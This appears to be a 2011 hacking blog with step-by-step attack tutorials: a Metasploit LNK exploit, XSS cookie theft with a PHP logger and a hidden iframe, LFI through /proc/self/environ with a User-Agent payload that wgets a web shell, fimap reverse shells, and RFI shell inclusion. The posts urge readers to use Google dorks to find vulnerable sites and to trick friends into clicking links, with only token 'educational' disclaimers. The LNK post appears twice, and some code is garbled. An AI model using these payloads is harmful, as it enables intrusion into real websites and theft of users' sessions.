Tuesday, October 25, 2011

Windows lnk Exploit


Hack the system using the windows lnk exploit:

Update metasploit.
Goto the prompt and goto framework

Then type:

#./msfconsole

Msf>prompt opens..

The search for the exploit windows lnk.

Msf>search lnk

Then it shows the exploit

exploit/xxxxx/xxxxxr/xxxxx_dllloader

then type:
msf>use exploitname(type above exploit)

set SRVHOST  tat is your local ip to get conection back
.
Then set payload

Shell/reverse_tcp payload works mostly

so type:

msf>set payload windows/metxxxxx/xxx_tcp
then set LHOST as your local ip

then type:

msf>exploit

you will be shown a url or address with port number..give it to ur friend
tada !
wait for the reverse connection.
---------------------------------------------------
Warning: Im not responsible for ur actions , just for educational purpose only

Cookie Grabbing using XSS


XSS means Cross-site Scripting is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users.

There are two types of XSS : Non-Persistent and Persistent.
If u need to know about persistent and non-persistent click here .

Now ..
Search for vulnerability in a site: its on you
This is a simple example here:
<sript>alert(“hi”);</script>


Make sure that you have a site where the cookie needs to be uploded..
(Where a link has to be sent and script executes )
Upload the below php script in your site ex:1.php

<?php

$cookie=$_GET[‘cookie’];     //storing cookies in a variable called $cookie.
$file=fopen(“cookies.txt”,”a”);  //opening a file called cookies.txt with append mode.
fwrite($file,$cookie.”\n\n\n);
fclose($file);
?>

Save it as “ 1.php

Now the url looks like : www.your_site.com/some_folder/1.php

Find vuln in a site then put it like this below :

http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.concat(escape(document.cookie));</script>

 now send this link but,mostly people wont click it because they find this url very suspicious.
So u need to mask it

Ex:

<iframe
src="http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.concat(escape(document.cookie));</script>" width="1" heigth="1"></iframe>
**
Now put this script in file called iclick.php .

Now your url looks like www.your_site.com/folder/iclick.php

Send this link to your friend or anyone else ask….(social engineer) to click on this link..
Tats it the cookies will be stored in cookies.txt file.
(download cookie editor addon and go on wat u want to do).
-------------------------------------------------

Warning: *** Im not reponsible for your actions. This is just for educational purpose only.

Tuesday, October 18, 2011

LFI (Local File Inclusion)


LFI bounce using chunked transfer encoding


Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected.
The vuln. Code looks like :

<?php
   $file = $_GET['file'];
   if(isset($file))
   {
       include("pages/$file");
   }
   else
   ……….
    ……..       
   ?>

Here from the code you can observe that its taking or including the file from locally.
To get LFI vuln sites use dork like :: inurl:php?id=*.php
The “ *.php” means that any file name with extension .php
Ex: inrul:php?page=contact.php, contactus.ph etc.
Or inurl:.php?file=somefile.php
(* im not Responsible for any of the actions for what you do , Just Educational purpose only)
There are two ways : Manual and automated.

MANUAL way for LFI:

proc/self/environ method:

 check for vuln site same as above

then:

Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :

http://www.website.com/view.php?page=../etc/passwd

we got error and no etc/passwd file.

*so we go more directories up

http://www.website.com/view.php?page=../../etc/passwd

If you get like:


 we succesfully included the etc/passwd file.

The check for /proc/self/environ (in place of /etc/passwd) we get message like :

The we need Tamper data addon on firefox :

Choose Tamper and in User-Agent filed write the following code :

<?system('wget http://site.com/shel.txt -O shel.php');?>

Then submit the request.

(*here shel.txt must contain the shel code where we are getting from other site using wget command*)

Tada !. shel uploaded. J

Warning: I am not responsible for your actions , please be careful.this is for educational purpose only.
--------------------------------------------------------------------------------

Automated:

now remove the file name in the url and replace with “ ../ “ (without quotes)
if you get error like ::

Warning: include_once(../) [function.include-once]: failed to open stream: Inappropriate ioctl for device in /home/sitname /public_html/index.php on line 10

Warning: include_once() [function.include]: Failed opening '../' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in/home/sitename/public_html/index.php on line 10


It is vulnerable to LFI


Now to attack :
You need a python script called “ fimap “ which can be downloaded from google
U need python installed to execute it.

Open cmd prompt goto the folder where fimap.py script is present and type ::
 “ fimap.py –u www.site.com/file.php?page=file.php

( -u :-  option for scan if vuln exists or not)

It tests for injecting a file where it is vulnerable : looks like this



Here from the above pic u can see at the bottom with : “ [1] /proc/self/environ “
0    (0- Clean/readable , 1- writable)

Now to exploit :: type:

fimap.py –x www.site.com/file.php?page=file.php “

 (-x : to exploit ; -u : scan for vuln).

Now you will find like this :



Choose domain , well here u need to choose a number here my option is “9” ,the thing here is the fimap stores the history of successful exploiting . so choose number corresponding to the domain which u have scanned.
After that it asks for options again to choose type vuln script (choose the number ,if there is only one script the type 1).

Then again it asks for type of available attacks : they are:

1.spawn fimap shell

2.pentest monkey reverse shell

Select option 1.

It will successfully inject

Tada !  you get the command prompt of the host.

( as for pentest monkey shell ,you need netcat and an open port to get the connection back.)
Warning: I am not responsible for your actions , please be careful.this is for educational purpose only.
You hardly find LFI vuln sites ,you need work ur ass off to get the sites.
--------------------------------------------------------------------------------------------------------

Monday, October 17, 2011

RFI (Remote File Inclusion)


Remote File Inclusion (RFI) is a type of vulnerability some websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to Code execution on the web server.
The main cause is due to the use of unvalidated external variables , Most notable is the include statement.
The vuln. Code looks like:       

<?php
  include($_GET['page']);
?>
 

To attack you do is search for site:
Example using google dork inurl:php?page= or some kind of the url should be like:
www.site.com/somefile.php?page=www.somesite.com
well we wont find RFI vuln sites these days you may find 1 or 2 in a million or maybe not.this is for educational purpose only.but I will be explaining you with screenshots.

Step1:find the vuln site.
Then place ../ at the end of url (remove the content in page=) like this
Ex:www.site.com/somefile.php?page=../

If it shows some kind of error like :: 

Warning: file(../) [function.file]: failed to open stream: Permission denied in\\systemname\users\ in line.


Then it is vuln to RFI.
Sometimes if you are lucky directly check with inserting the other url .
Ex:www.site.com/file.php?page=www.google.com

Tats it now to take over this site all u need is a SHELL. A shell is like a unauthorized backdoor control panel of website.and it should be in the .txt extension

 (* im not responsible for any of your actions , for education purpose only.*)

Now put in the url like :: www.site.com/file.php?id=http://www.site.com/shell.txt

This shell.txt comes from other site which u have already hacked and uploaded the txt file.

You will find like this :::tada !



Saturday, October 15, 2011

Metasploit Basic exploiting for new Starters




SCANNED WITH NESSUS :
IP : 192.168.*.*


Number of vulnerabilities
Open ports :
29
High :
300
Medium :
47
Low :
77


Remote host information
Operating System :
Microsoft Windows  Server (English)

Synopsis:
The remote host seems to be a VMware virtual machine.

Description:
According to the MAC address of its network adapter, the remote host is a VMware virtual machine.

LIST OF OPEN PORTS:



TESTING WITH FRAMEWORK:
Ex:
Goto metasploit framework
I’ve chosen 445 port since it has got high number of vulnerabilities.


Now we choose the vulnerability with id :19408 .
Now we got to framework and search for the exploit corresponding to the above vulnerability.

 

We choose the above exploit:
Ex:


Now type >show options to see the target host is set or not.

 

As you can see there is no target  set ,so now we set the target below:





The target should to 0 as it is given it works against windows 2***. :


---------------------------------------------
Now we select the payloads :
To see the payloads type :
>show payloads.
To set the payload see below:

To see if our local ip or host is set or not  type:
>show options
U will see this :



As u can observe that LHOST is not set that is our local ip :
To set it . type :

>set LHOST <host ip>

Now type
>exploit


Hurrayy…!
U will be getting the target host command shell.
Njoy.!

========================================================================


Windows lnk Exploit

Hack the system using the windows lnk exploit:

Update metasploit.
Goto the prompt and goto framework

Then type:

#./msfconsole

Msf>prompt opens..

The search for the exploit windows lnk.

Msf>search lnk

Then it shows the exploit

exploit/xxxxx/xxxxxr/xxxxx_dllloader

then type:
msf>use exploitname(type above exploit)

set SRVHOST  tat is your local ip to get conection back
.
Then set payload

Shell/reverse_tcp payload works mostly

so type:

msf>set payload windows/metxxxxx/xxx_tcp
then set LHOST as your local ip

then type:

msf>exploit

you will be shown a url or address with port number..give it to ur friend
tada !
wait for the reverse connection.
---------------------------------------------------
Warning: Im not responsible for ur actions , just for educational purpose only

Twitter Delicious Facebook Digg Stumbleupon Favorites More